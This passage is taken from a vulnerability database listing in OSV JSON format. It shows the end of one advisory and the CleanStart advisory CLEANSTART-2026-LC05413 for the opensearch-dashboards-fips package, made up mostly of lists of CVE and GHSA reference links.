"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-j3q9-mxjg-w52f"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jg4p-7fhp-p32p"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-m7pr-hjqh-92cm"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-p6xx-57qc-3wxr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-p77w-8qqv-26rm"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-pf86-5x62-jrwf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-pmwg-cvhr-8vh7"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-ppp5-5v6c-4jwp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-q3j6-qgpj-74h6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-q5qw-h33p-qvwr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-q67f-28xg-22rw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-q8qp-cvcw-x6jj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qj8w-gfj5-8c6v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qp7p-654g-cw7p"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r4q5-vmmm-2653"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r5fr-rjxr-66jc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r5rp-j6wh-rvv4"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v2v4-37r5-5v8g"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v39h-62p7-jpjc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v8w9-8mx6-g223"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v9jr-rg53-9pgp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-vf2m-468p-8v99"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w9j2-pvgh-6h63"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-wc8c-qw6v-h7f6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-wmmm-f939-6g9c"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xf4j-xp2r-rqqx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xhjh-pmcv-23jw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xhpv-hc6g-r9c6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xjpj-3mr7-gcpf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xpcf-pg52-r92g"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xx6v-rp6x-q39c"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29045"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29085"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29086"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29087"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2950"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30827"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33750"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33891"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33895"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33896"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33916"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33937"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34043"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35213"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39406"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39407"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39408"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39409"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39410"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40175"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41238"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41239"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41240"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42033"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42034"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42035"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42036"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42037"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42038"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42039"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42040"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42041"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42042"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42043"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42264"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42338"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44455"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44456"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44457"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44458"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44459"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4923"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4926"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6321"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6322"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2025-62718, CVE-2025-69873, CVE-2026-29045, CVE-2026-29085, CVE-2026-29086, CVE-2026-29087, CVE-2026-2950, CVE-2026-30827, CVE-2026-33750, CVE-2026-33891, CVE-2026-33894, CVE-2026-33895, CVE-2026-33896, CVE-2026-33916, CVE-2026-33937, CVE-2026-34043, CVE-2026-35213, CVE-2026-39406, CVE-2026-39407, CVE-2026-39408, CVE-2026-39409, CVE-2026-39410, CVE-2026-40175, CVE-2026-41238, CVE-2026-41239, CVE-2026-41240, CVE-2026-42033, CVE-2026-42034, CVE-2026-42035, CVE-2026-42036, CVE-2026-42037, CVE-2026-42038, CVE-2026-42039, CVE-2026-42040, CVE-2026-42041, CVE-2026-42042, CVE-2026-42043, CVE-2026-42044, CVE-2026-42264, CVE-2026-42338, CVE-2026-44455, CVE-2026-44456, CVE-2026-44457, CVE-2026-44458, CVE-2026-44459, CVE-2026-4800, CVE-2026-4923, CVE-2026-4926, CVE-2026-6321, CVE-2026-6322, ghsa-2328-f5f3-gj25, ghsa-26pp-8wgv-hjvm, ghsa-27v5-c462-wpq7, ghsa-2g4f-4pwh-qvx6, ghsa-2qvq-rjwj-gvw9, ghsa-2w6w-674q-4c4q, ghsa-39q2-94rc-95cp, ghsa-3mfm-83xf-c92r, ghsa-3p68-rc4w-qgx5, ghsa-3v7f-55p6-f55p, ghsa-3w6x-2g7m-8v23, ghsa-442j-39wm-28r2, ghsa-445q-vr5w-6q77, ghsa-458j-xx4x-4375, ghsa-46wh-pxpv-q5gq, ghsa-5c6j-r48x-rmvq, ghsa-5c9x-8gcm-mpgx, ghsa-5m6q-g25r-mvwx, ghsa-5pq2-9x2x-5p6w, ghsa-62hf-57xw-28j9, ghsa-69xw-7hcm-h432, ghsa-6chq-wfr3-2hj9, ghsa-7rx3-28cr-v5wh, ghsa-92pp-h63x-v22m, ghsa-9cx6-37pm-9jff, ghsa-9vqf-7f2p-gf9v, ghsa-c2c7-rcm5-vvqj, ghsa-crv5-9vww-q3g8, ghsa-f23m-r3pf-42rh, ghsa-f886-m6hf-6m8v, ghsa-fvcv-3m26-pcqx, ghsa-h7mw-gpvr-xq4m, ghsa-j3q9-mxjg-w52f, ghsa-jg4p-7fhp-p32p, ghsa-m7pr-hjqh-92cm, ghsa-p6xx-57qc-3wxr, ghsa-p77w-8qqv-26rm, ghsa-pf86-5x62-jrwf, ghsa-pmwg-cvhr-8vh7, ghsa-ppp5-5v6c-4jwp, ghsa-q3j6-qgpj-74h6, ghsa-q5qw-h33p-qvwr, ghsa-q67f-28xg-22rw, ghsa-q8qp-cvcw-x6jj, ghsa-qj8w-gfj5-8c6v, ghsa-qp7p-654g-cw7p, ghsa-r4q5-vmmm-2653, ghsa-r5fr-rjxr-66jc, ghsa-r5rp-j6wh-rvv4, ghsa-v2v4-37r5-5v8g, ghsa-v39h-62p7-jpjc, ghsa-v8w9-8mx6-g223, ghsa-v9jr-rg53-9pgp, ghsa-vf2m-468p-8v99, ghsa-w9j2-pvgh-6h63, ghsa-wc8c-qw6v-h7f6, ghsa-wmmm-f939-6g9c, ghsa-xf4j-xp2r-rqqx, ghsa-xhjh-pmcv-23jw, ghsa-xhpv-hc6g-r9c6, ghsa-xjpj-3mr7-gcpf, ghsa-xpcf-pg52-r92g, ghsa-xx6v-rp6x-q39c applied in versions: 2.19.5-r0",
"upstream": [
"CVE-2025-62718",
"CVE-2025-69873",
"CVE-2026-29045",
"CVE-2026-29085",
"CVE-2026-29086",
"CVE-2026-29087",
"CVE-2026-2950",
"CVE-2026-30827",
"CVE-2026-33750",
"CVE-2026-33891",
"CVE-2026-33894",
"CVE-2026-33895",
"CVE-2026-33896",
"CVE-2026-33916",
"CVE-2026-33937",
"CVE-2026-34043",
"CVE-2026-35213",
"CVE-2026-39406",
"CVE-2026-39407",
"CVE-2026-39408",
"CVE-2026-39409",
"CVE-2026-39410",
"CVE-2026-40175",
"CVE-2026-41238",
"CVE-2026-41239",
"CVE-2026-41240",
"CVE-2026-42033",
"CVE-2026-42034",
"CVE-2026-42035",
"CVE-2026-42036",
"CVE-2026-42037",
"CVE-2026-42038",
"CVE-2026-42039",
"CVE-2026-42040",
"CVE-2026-42041",
"CVE-2026-42042",
"CVE-2026-42043",
"CVE-2026-42044",
"CVE-2026-42264",
"CVE-2026-42338",
"CVE-2026-44455",
"CVE-2026-44456",
"CVE-2026-44457",
"CVE-2026-44458",
"CVE-2026-44459",
"CVE-2026-4800",
"CVE-2026-4923",
"CVE-2026-4926",
"CVE-2026-6321",
"CVE-2026-6322",
"ghsa-2328-f5f3-gj25",
"ghsa-26pp-8wgv-hjvm",
"ghsa-27v5-c462-wpq7",
"ghsa-2g4f-4pwh-qvx6",
"ghsa-2qvq-rjwj-gvw9",
"ghsa-2w6w-674q-4c4q",
"ghsa-39q2-94rc-95cp",
"ghsa-3mfm-83xf-c92r",
"ghsa-3p68-rc4w-qgx5",
"ghsa-3v7f-55p6-f55p",
"ghsa-3w6x-2g7m-8v23",
"ghsa-442j-39wm-28r2",
"ghsa-445q-vr5w-6q77",
"ghsa-458j-xx4x-4375",
"ghsa-46wh-pxpv-q5gq",
"ghsa-5c6j-r48x-rmvq",
"ghsa-5c9x-8gcm-mpgx",
"ghsa-5m6q-g25r-mvwx",
"ghsa-5pq2-9x2x-5p6w",
"ghsa-62hf-57xw-28j9",
"ghsa-69xw-7hcm-h432",
"ghsa-6chq-wfr3-2hj9",
"ghsa-7rx3-28cr-v5wh",
"ghsa-92pp-h63x-v22m",
"ghsa-9cx6-37pm-9jff",
"ghsa-9vqf-7f2p-gf9v",
"ghsa-c2c7-rcm5-vvqj",
"ghsa-crv5-9vww-q3g8",
"ghsa-f23m-r3pf-42rh",
"ghsa-f886-m6hf-6m8v",
"ghsa-fvcv-3m26-pcqx",
"ghsa-h7mw-gpvr-xq4m",
"ghsa-j3q9-mxjg-w52f",
"ghsa-jg4p-7fhp-p32p",
"ghsa-m7pr-hjqh-92cm",
"ghsa-p6xx-57qc-3wxr",
"ghsa-p77w-8qqv-26rm",
"ghsa-pf86-5x62-jrwf",
"ghsa-pmwg-cvhr-8vh7",
"ghsa-ppp5-5v6c-4jwp",
"ghsa-q3j6-qgpj-74h6",
"ghsa-q5qw-h33p-qvwr",
"ghsa-q67f-28xg-22rw",
"ghsa-q8qp-cvcw-x6jj",
"ghsa-qj8w-gfj5-8c6v",
"ghsa-qp7p-654g-cw7p",
"ghsa-r4q5-vmmm-2653",
"ghsa-r5fr-rjxr-66jc",
"ghsa-r5rp-j6wh-rvv4",
"ghsa-v2v4-37r5-5v8g",
"ghsa-v39h-62p7-jpjc",
"ghsa-v8w9-8mx6-g223",
"ghsa-v9jr-rg53-9pgp",
"ghsa-vf2m-468p-8v99",
"ghsa-w9j2-pvgh-6h63",
"ghsa-wc8c-qw6v-h7f6",
"ghsa-wmmm-f939-6g9c",
"ghsa-xf4j-xp2r-rqqx",
"ghsa-xhjh-pmcv-23jw",
"ghsa-xhpv-hc6g-r9c6",
"ghsa-xjpj-3mr7-gcpf",
"ghsa-xpcf-pg52-r92g",
"ghsa-xx6v-rp6x-q39c"
]
}
cleanstart-2026-lc05413
Vulnerability from cleanstart
Multiple security vulnerabilities affect the opensearch-dashboards-fips package. These issues are resolved in later releases. See references for individual vulnerability details.
| URL | Type | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "opensearch-dashboards-fips"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.5.0-r2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the opensearch-dashboards-fips package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-LC05413",
"modified": "2026-05-13T14:10:22Z",
"published": "2026-05-18T13:18:14.800358Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-LC05413.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-15599"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-62718"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-69873"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-0540"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-25639"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2739"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27903"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27904"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2950"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33750"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33916"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33937"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-35213"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-40175"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-41238"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-41239"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-41240"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42033"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42034"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42035"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42036"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42037"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42038"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42039"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42040"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42041"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42042"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42043"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42044"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42264"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-4800"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-6321"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-6322"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2328-f5f3-gj25"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-23c5-xmqv-rm74"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2g4f-4pwh-qvx6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2qvq-rjwj-gvw9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2w6w-674q-4c4q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-378v-28hj-76wf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-37qj-frw5-hhjh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-39q2-94rc-95cp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3mfm-83xf-c92r"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3p68-rc4w-qgx5"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3ppc-4f35-3m26"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3v7f-55p6-f55p"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3w6x-2g7m-8v23"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-43fc-jf86-j433"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-442j-39wm-28r2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-445q-vr5w-6q77"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5c6j-r48x-rmvq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5c9x-8gcm-mpgx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5m6q-g25r-mvwx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-62hf-57xw-28j9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-6475-r3vj-m8vf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-6chq-wfr3-2hj9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7r86-cg39-jmmj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7rx3-28cr-v5wh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-83g3-92jg-28cx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8gc5-j5rx-235r"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9cx6-37pm-9jff"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9ppj-qmqm-q256"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-c2c7-rcm5-vvqj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-cj63-jhhr-wcxv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-cjmm-f4jc-qw8r"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-crv5-9vww-q3g8"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f23m-r3pf-42rh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f886-m6hf-6m8v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-fj3w-jwp8-x2g3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-fvcv-3m26-pcqx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-gh4j-gqv2-49f6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-h7mw-gpvr-xq4m"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-h8r8-wccr-v5f2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jg4p-7fhp-p32p"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jmr7-xgp7-cmfj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jp2q-39xq-3w4g"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-m7jm-9gc2-mpf2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-m7pr-hjqh-92cm"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-pf86-5x62-jrwf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-pmwg-cvhr-8vh7"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-ppp5-5v6c-4jwp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-q3j6-qgpj-74h6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-q67f-28xg-22rw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-q8qp-cvcw-x6jj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qffp-2rhf-9h96"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qj8w-gfj5-8c6v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r4q5-vmmm-2653"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r5fr-rjxr-66jc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v2v4-37r5-5v8g"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v2wj-7wpq-c8vv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v39h-62p7-jpjc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v8jm-5vwx-cfxm"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v9jr-rg53-9pgp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-vf2m-468p-8v99"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w5hq-g745-h8pq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w7fw-mjwx-w883"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w9j2-pvgh-6h63"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xhjh-pmcv-23jw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xhpv-hc6g-r9c6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xjpj-3mr7-gcpf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xx6v-rp6x-q39c"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15599"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0540"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2739"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27903"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2950"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33750"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33916"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33937"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35213"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40175"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41238"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41239"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41240"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42033"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42034"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42035"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42036"
},
{
"type": "WEB",
